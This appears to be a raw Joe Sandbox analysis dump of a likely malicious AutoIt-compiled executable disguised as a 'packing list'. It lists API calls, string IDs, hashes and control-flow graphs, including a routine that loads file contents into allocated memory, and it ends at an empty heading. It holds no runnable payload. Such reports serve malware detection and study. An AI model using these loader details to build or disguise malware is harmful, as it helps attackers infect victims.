                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B3449E,?,?,00000000,00000001), ref: 00B34092
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00B3449E,?,?,00000000,00000001,?,?,?,?,?,?,00B341FB), ref: 00BA4F1A
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00B3449E,?,?,00000000,00000001,?,?,?,?,?,?,00B341FB), ref: 00BA4F2F
                                                  • LockResource.KERNEL32(00B3449E,?,?,00B3449E,?,?,00000000,00000001,?,?,?,?,?,?,00B341FB,00000000), ref: 00BA4F42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: a6ed6951a8c93047390fc55e44ee7c85a76959b13823a87dc375db996963da0a
                                                  • Instruction ID: 119a8dfcb4c9ae4416af360a2589b57ee716af638442c6bf7b85171e28f82390
                                                  • Opcode Fuzzy Hash: a6ed6951a8c93047390fc55e44ee7c85a76959b13823a87dc375db996963da0a
                                                  • Instruction Fuzzy Hash: AD113071200701BFE7259B65EC48F277BF9EBC5B51F20416CF61297260EBB1EC048A20
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00BA2F49), ref: 00B76CB9
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 00B76CCA
                                                  • FindClose.KERNEL32(00000000), ref: 00B76CDA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 3deb162fb1031334f701f02c21392dd651a8e447cc0dabe9fea56493217ff54c
                                                  • Instruction ID: 6bce61b9a83ba3cb40536e5409fdc2e5892a8fe0b69866580422878726d4f2cb
                                                  • Opcode Fuzzy Hash: 3deb162fb1031334f701f02c21392dd651a8e447cc0dabe9fea56493217ff54c
                                                  • Instruction Fuzzy Hash: 0BE0D8318108115B8210673CEC4D4E937ACDA05339F104755F475D21D0FBB4DD1445D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throwstd::exception::exception
                                                  • String ID: @
                                                  • API String ID: 3728558374-2766056989
                                                  • Opcode ID: e89c5d27b32ae6666ae6311f6f0883776c74293190cca672d3bec311e2011702
                                                  • Instruction ID: 47a43d7d1c7544b322693f565d12b861f6c7e0c39df0a54eec270e48d3e559e2
                                                  • Opcode Fuzzy Hash: e89c5d27b32ae6666ae6311f6f0883776c74293190cca672d3bec311e2011702
                                                  • Instruction Fuzzy Hash: B872C070E08209AFCF14DF98C881ABEB7F5EF49700F1880D9E915AB251DB71AE45DB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID:
                                                  • API String ID: 3964851224-0
                                                  • Opcode ID: b0222cade364587fd91b3da3de70395debd438d56531e09c70e07cafbe973a12
                                                  • Instruction ID: 81e5233df4ba3f15c44e53e176427c41f6b420a0d48849e31d3511da2fe3459a
                                                  • Opcode Fuzzy Hash: b0222cade364587fd91b3da3de70395debd438d56531e09c70e07cafbe973a12
                                                  • Instruction Fuzzy Hash: 7A926B706083419FD724DF18C480B6ABBE1FF89704F18889DE99A8B362D771EE45DB52
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3E959
                                                  • timeGetTime.WINMM ref: 00B3EBFA
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3ED2E
                                                  • TranslateMessage.USER32(?), ref: 00B3ED3F
                                                  • DispatchMessageW.USER32(?), ref: 00B3ED4A
                                                  • LockWindowUpdate.USER32(00000000), ref: 00B3ED79
                                                  • DestroyWindow.USER32 ref: 00B3ED85
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3ED9F
                                                  • Sleep.KERNEL32(0000000A), ref: 00BA5270
                                                  • TranslateMessage.USER32(?), ref: 00BA59F7
                                                  • DispatchMessageW.USER32(?), ref: 00BA5A05
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BA5A19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 2641332412-570651680
                                                  • Opcode ID: 40b9019737a65b4c264a38ca3734441089d0886ba12cafd4baefcd68adec20c7
                                                  • Instruction ID: 3ba8958f7012e51e1297400bb780b27ce532fb05ecb13a1c9f41f9ed024bc2fa
                                                  • Opcode Fuzzy Hash: 40b9019737a65b4c264a38ca3734441089d0886ba12cafd4baefcd68adec20c7
                                                  • Instruction Fuzzy Hash: BD62AF70508340DBDB21DF24C885BAA77E4FF45304F2449AEF99A9B2D2DB74E948CB52
                                                  APIs
                                                  • ___createFile.LIBCMT ref: 00B65EC3
                                                  • ___createFile.LIBCMT ref: 00B65F04
                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B65F2D
                                                  • __dosmaperr.LIBCMT ref: 00B65F34
                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00B65F47
                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B65F6A
                                                  • __dosmaperr.LIBCMT ref: 00B65F73
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B65F7C
                                                  • __set_osfhnd.LIBCMT ref: 00B65FAC
                                                  • __lseeki64_nolock.LIBCMT ref: 00B66016
                                                  • __close_nolock.LIBCMT ref: 00B6603C
                                                  • __chsize_nolock.LIBCMT ref: 00B6606C
                                                  • __lseeki64_nolock.LIBCMT ref: 00B6607E
                                                  • __lseeki64_nolock.LIBCMT ref: 00B66176
                                                  • __lseeki64_nolock.LIBCMT ref: 00B6618B
                                                  • __close_nolock.LIBCMT ref: 00B661EB
                                                    • Part of subcall function 00B5EA9C: CloseHandle.KERNELBASE(00000000,00BDEEF4,00000000,?,00B66041,00BDEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B5EAEC
                                                    • Part of subcall function 00B5EA9C: GetLastError.KERNEL32(?,00B66041,00BDEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B5EAF6
                                                    • Part of subcall function 00B5EA9C: __free_osfhnd.LIBCMT ref: 00B5EB03
                                                    • Part of subcall function 00B5EA9C: __dosmaperr.LIBCMT ref: 00B5EB25
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  • __lseeki64_nolock.LIBCMT ref: 00B6620D
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B66342
                                                  • ___createFile.LIBCMT ref: 00B66361
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B6636E
                                                  • __dosmaperr.LIBCMT ref: 00B66375
                                                  • __free_osfhnd.LIBCMT ref: 00B66395
                                                  • __invoke_watson.LIBCMT ref: 00B663C3
                                                  • __wsopen_helper.LIBCMT ref: 00B663DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                  • String ID: @
                                                  • API String ID: 3896587723-2766056989
                                                  • Opcode ID: 4d26044677cf541b72b75e67b0a30e688d47e2dd5f925794cf33f58f70b00f22
                                                  • Instruction ID: 2f2a0a99ffff7b71cca32bea4fc1abc449efcb71fe33a0e814fe9494500bac3d
                                                  • Opcode Fuzzy Hash: 4d26044677cf541b72b75e67b0a30e688d47e2dd5f925794cf33f58f70b00f22
                                                  • Instruction Fuzzy Hash: 1F22577190060A9FEF299F68DC95BBD7BE1EB11314F2442E8E921A72D2C73D8D50CB91

                                                  Control-flow Graph

                                                  APIs
                                                  • _wcscpy.LIBCMT ref: 00B7FA96
                                                  • _wcschr.LIBCMT ref: 00B7FAA4
                                                  • _wcscpy.LIBCMT ref: 00B7FABB
                                                  • _wcscat.LIBCMT ref: 00B7FACA
                                                  • _wcscat.LIBCMT ref: 00B7FAE8
                                                  • _wcscpy.LIBCMT ref: 00B7FB09
                                                  • __wsplitpath.LIBCMT ref: 00B7FBE6
                                                  • _wcscpy.LIBCMT ref: 00B7FC0B
                                                  • _wcscpy.LIBCMT ref: 00B7FC1D
                                                  • _wcscpy.LIBCMT ref: 00B7FC32
                                                  • _wcscat.LIBCMT ref: 00B7FC47
                                                  • _wcscat.LIBCMT ref: 00B7FC59
                                                  • _wcscat.LIBCMT ref: 00B7FC6E
                                                    • Part of subcall function 00B7BFA4: _wcscmp.LIBCMT ref: 00B7C03E
                                                    • Part of subcall function 00B7BFA4: __wsplitpath.LIBCMT ref: 00B7C083
                                                    • Part of subcall function 00B7BFA4: _wcscpy.LIBCMT ref: 00B7C096
                                                    • Part of subcall function 00B7BFA4: _wcscat.LIBCMT ref: 00B7C0A9
                                                    • Part of subcall function 00B7BFA4: __wsplitpath.LIBCMT ref: 00B7C0CE
                                                    • Part of subcall function 00B7BFA4: _wcscat.LIBCMT ref: 00B7C0E4
                                                    • Part of subcall function 00B7BFA4: _wcscat.LIBCMT ref: 00B7C0F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                  • API String ID: 2955681530-2806939583
                                                  • Opcode ID: f71fa8a68f072f6fc5c8cb3f5b2649b4e817c6088fb9d83e87d90216d68408ef
                                                  • Instruction ID: 69d745d0333aa0d9ed6dfb88f6ade14a6f152fbf2212c1c45f7e441f342e3b9f
                                                  • Opcode Fuzzy Hash: f71fa8a68f072f6fc5c8cb3f5b2649b4e817c6088fb9d83e87d90216d68408ef
                                                  • Instruction Fuzzy Hash: 90919571504745AFDB20EB54C891FABB3E8FF94310F0488E9F95997291DB30EA48CB55

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B33F86
                                                  • RegisterClassExW.USER32(00000030), ref: 00B33FB0
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B33FC1
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00B33FDE
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B33FEE
                                                  • LoadIconW.USER32(000000A9), ref: 00B34004
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B34013
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 0a662ca577defb9a05594ad246b8cdeba8afc5472f71e44f9c437538cf40d639
                                                  • Instruction ID: b32b90f1a49dae3b16159d1aab9580774e639295dcd77356a347fce368ff03f2
                                                  • Opcode Fuzzy Hash: 0a662ca577defb9a05594ad246b8cdeba8afc5472f71e44f9c437538cf40d639
                                                  • Instruction Fuzzy Hash: 7221C3B5900218EFDB00DFA9E889BDDBBB4FB08700F004A1AF611E72A0EBB54544CF91

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00B7BDB4: __time64.LIBCMT ref: 00B7BDBE
                                                    • Part of subcall function 00B34517: _fseek.LIBCMT ref: 00B3452F
                                                  • __wsplitpath.LIBCMT ref: 00B7C083
                                                    • Part of subcall function 00B51DFC: __wsplitpath_helper.LIBCMT ref: 00B51E3C
                                                  • _wcscpy.LIBCMT ref: 00B7C096
                                                  • _wcscat.LIBCMT ref: 00B7C0A9
                                                  • __wsplitpath.LIBCMT ref: 00B7C0CE
                                                  • _wcscat.LIBCMT ref: 00B7C0E4
                                                  • _wcscat.LIBCMT ref: 00B7C0F7
                                                  • _wcscmp.LIBCMT ref: 00B7C03E
                                                    • Part of subcall function 00B7C56D: _wcscmp.LIBCMT ref: 00B7C65D
                                                    • Part of subcall function 00B7C56D: _wcscmp.LIBCMT ref: 00B7C670
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B7C2A1
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B7C338
                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B7C34E
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B7C35F
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B7C371
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                  • String ID:
                                                  • API String ID: 2378138488-0
                                                  • Opcode ID: 39ebd2860873091ec6b6834c1c3b06bbcb77ca3b294b4e13721d627761e64f1b
                                                  • Instruction ID: 3d8286d76f973c301e8004a221a870c5a95ae23fd44edeae3df0e5f23237b255
                                                  • Opcode Fuzzy Hash: 39ebd2860873091ec6b6834c1c3b06bbcb77ca3b294b4e13721d627761e64f1b
                                                  • Instruction Fuzzy Hash: 64C11AB1900219ABDF21DF95CC81EDEBBF9EF49310F1080EAE619E7151DB709A848F65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 957 b33742-b33762 959 b337c2-b337c4 957->959 960 b33764-b33767 957->960 959->960 963 b337c6 959->963 961 b33769-b33770 960->961 962 b337c8 960->962 964 b33776-b3377b 961->964 965 b3382c-b33834 PostQuitMessage 961->965 967 ba1e00-ba1e2e call b32ff6 call b4e312 962->967 968 b337ce-b337d1 962->968 966 b337ab-b337b3 DefWindowProcW 963->966 970 ba1e88-ba1e9c call b74ddd 964->970 971 b33781-b33783 964->971 972 b337f2-b337f4 965->972 973 b337b9-b337bf 966->973 1002 ba1e33-ba1e3a 967->1002 974 b337d3-b337d4 968->974 975 b337f6-b3381d SetTimer RegisterWindowMessageW 968->975 970->972 995 ba1ea2 970->995 977 b33836-b33840 call b4eb83 971->977 978 b33789-b3378e 971->978 972->973 981 ba1da3-ba1da6 974->981 982 b337da-b337ed KillTimer call b33847 call b3390f 974->982 975->972 979 b3381f-b3382a CreatePopupMenu 975->979 996 b33845 977->996 984 ba1e6d-ba1e74 978->984 985 b33794-b33799 978->985 979->972 988 ba1da8-ba1daa 981->988 989 ba1ddc-ba1dfb MoveWindow 981->989 982->972 984->966 991 ba1e7a-ba1e83 call b6a5f3 984->991 993 ba1e58-ba1e68 call b755bd 985->993 994 b3379f-b337a5 985->994 997 ba1dcb-ba1dd7 SetFocus 988->997 998 ba1dac-ba1daf 988->998 989->972 991->966 993->972 994->966 994->1002 995->966 996->972 997->972 998->994 1003 ba1db5-ba1dc6 call b32ff6 998->1003 1002->966 1006 ba1e40-ba1e53 call b33847 call b34ffc 1002->1006 1003->972 1006->966
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00B337B3
                                                  • KillTimer.USER32(?,00000001), ref: 00B337DD
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B33800
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B3380B
                                                  • CreatePopupMenu.USER32 ref: 00B3381F
                                                  • PostQuitMessage.USER32(00000000), ref: 00B3382E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 2c02f6ddd11953a085c0511dba50db30cf25297d5d75eeae92f64d06efe4ee01
                                                  • Instruction ID: 427f2f726ad655f63c652e5d5ca04a46d1f518334d265cc95e3eb6981b488b51
                                                  • Opcode Fuzzy Hash: 2c02f6ddd11953a085c0511dba50db30cf25297d5d75eeae92f64d06efe4ee01
                                                  • Instruction Fuzzy Hash: 3F41E4F510424AEBDB14AB2CDC8AF7B37D9F700B01F240EA9FA06931A1DF659E409761

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B33E79
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00B33E88
                                                  • LoadIconW.USER32(00000063), ref: 00B33E9E
                                                  • LoadIconW.USER32(000000A4), ref: 00B33EB0
                                                  • LoadIconW.USER32(000000A2), ref: 00B33EC2
                                                    • Part of subcall function 00B34024: LoadImageW.USER32(00B30000,00000063,00000001,00000010,00000010,00000000), ref: 00B34048
                                                  • RegisterClassExW.USER32(?), ref: 00B33F30
                                                    • Part of subcall function 00B33F53: GetSysColorBrush.USER32(0000000F), ref: 00B33F86
                                                    • Part of subcall function 00B33F53: RegisterClassExW.USER32(00000030), ref: 00B33FB0
                                                    • Part of subcall function 00B33F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B33FC1
                                                    • Part of subcall function 00B33F53: InitCommonControlsEx.COMCTL32(?), ref: 00B33FDE
                                                    • Part of subcall function 00B33F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B33FEE
                                                    • Part of subcall function 00B33F53: LoadIconW.USER32(000000A9), ref: 00B34004
                                                    • Part of subcall function 00B33F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B34013
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 733acb65154f4505c59d3b8003420803c3f1b918610d442f9337b8a2af02826d
                                                  • Instruction ID: ae7bed128e34b1eac48754e4a89802d27fae8df97a8fb3cf61f7ea653661a5af
                                                  • Opcode Fuzzy Hash: 733acb65154f4505c59d3b8003420803c3f1b918610d442f9337b8a2af02826d
                                                  • Instruction Fuzzy Hash: E3212FB0D04304EBDB04DFAEEC45AA9BBF5EB48710F108A6AE214B72A0DB754644CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1021 1349d80-1349e2e call 1347780 1024 1349e35-1349e5b call 134ac90 CreateFileW 1021->1024 1027 1349e62-1349e72 1024->1027 1028 1349e5d 1024->1028 1033 1349e74 1027->1033 1034 1349e79-1349e93 VirtualAlloc 1027->1034 1029 1349fad-1349fb1 1028->1029 1031 1349ff3-1349ff6 1029->1031 1032 1349fb3-1349fb7 1029->1032 1035 1349ff9-134a000 1031->1035 1036 1349fc3-1349fc7 1032->1036 1037 1349fb9-1349fbc 1032->1037 1033->1029 1040 1349e95 1034->1040 1041 1349e9a-1349eb1 ReadFile 1034->1041 1042 134a055-134a06a 1035->1042 1043 134a002-134a00d 1035->1043 1038 1349fd7-1349fdb 1036->1038 1039 1349fc9-1349fd3 1036->1039 1037->1036 1046 1349fdd-1349fe7 1038->1046 1047 1349feb 1038->1047 1039->1038 1040->1029 1048 1349eb3 1041->1048 1049 1349eb8-1349ef8 VirtualAlloc 1041->1049 1044 134a06c-134a077 VirtualFree 1042->1044 1045 134a07a-134a082 1042->1045 1050 134a011-134a01d 1043->1050 1051 134a00f 1043->1051 1044->1045 1046->1047 1047->1031 1048->1029 1052 1349eff-1349f1a call 134aee0 1049->1052 1053 1349efa 1049->1053 1054 134a031-134a03d 1050->1054 1055 134a01f-134a02f 1050->1055 1051->1042 1061 1349f25-1349f2f 1052->1061 1053->1029 1058 134a03f-134a048 1054->1058 1059 134a04a-134a050 1054->1059 1057 134a053 1055->1057 1057->1035 1058->1057 1059->1057 1062 1349f31-1349f60 call 134aee0 1061->1062 1063 1349f62-1349f76 call 134acf0 1061->1063 1062->1061 1069 1349f78 1063->1069 1070 1349f7a-1349f7e 1063->1070 1069->1029 1071 1349f80-1349f84 CloseHandle 1070->1071 1072 1349f8a-1349f8e 1070->1072 1071->1072 1073 1349f90-1349f9b VirtualFree 1072->1073 1074 1349f9e-1349fa7 1072->1074 1073->1074 1074->1024 1074->1029
                                                  APIs
